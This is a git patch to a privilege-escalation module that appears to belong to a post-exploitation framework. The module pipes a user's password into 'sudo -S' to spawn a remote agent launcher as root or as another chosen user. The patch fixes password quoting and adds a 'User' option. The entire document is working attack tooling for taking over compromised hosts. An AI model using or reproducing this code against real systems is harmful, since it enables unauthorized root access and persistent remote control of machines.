From e4eec0f3e664872bbc44dc518f97847f2f0c77b7 Mon Sep 17 00:00:00 2001 From: Peter Toth Date: Sun, 23 Apr 2017 01:15:40 +0200 Subject: [PATCH] Two bugfixes and one new feature Bug 1: Password could not contain a double quote. This is fixed on line 108 Bug 2: Password could not start with (or possibly contain) an exclamation mark. This is fixed by using single quotes when echoing the password. Feature: Optionally give a username. If a username is given then the sudo command will request that user's password, and the agent will be spawned using that user. --- lib/modules/privesc/multi/sudo_spawn.py | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/lib/modules/privesc/multi/sudo_spawn.py b/lib/modules/privesc/multi/sudo_spawn.py index b5f5939..363702f 100644 --- a/lib/modules/privesc/multi/sudo_spawn.py +++ b/lib/modules/privesc/multi/sudo_spawn.py @@ -41,6 +41,11 @@ def __init__(self, mainMenu, params=[]): 'Required' : True, 'Value' : '' }, + 'User' : { + 'Description' : 'Spawn agent as user.', + 'Required' : False, + 'Value' : '' + }, 'Password' : { 'Description' : 'User password for sudo.', 'Required' : True, @@ -98,11 +103,16 @@ def generate(self): return "" else: + user = self.options['User']['Value'] password = self.options['Password']['Value'] + password = password.replace('"', '\\"') launcher = launcher.replace('"', '\\"') launcher = launcher.replace('echo', '') parts = launcher.split("|") launcher = "python -c %s" % (parts[0]) - script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher) + script = 'import subprocess; subprocess.Popen("echo \'%s\' | sudo -S -u %s %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, user, launcher) + if not user: + script = 'import subprocess; subprocess.Popen("echo \'%s\' | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher) + return script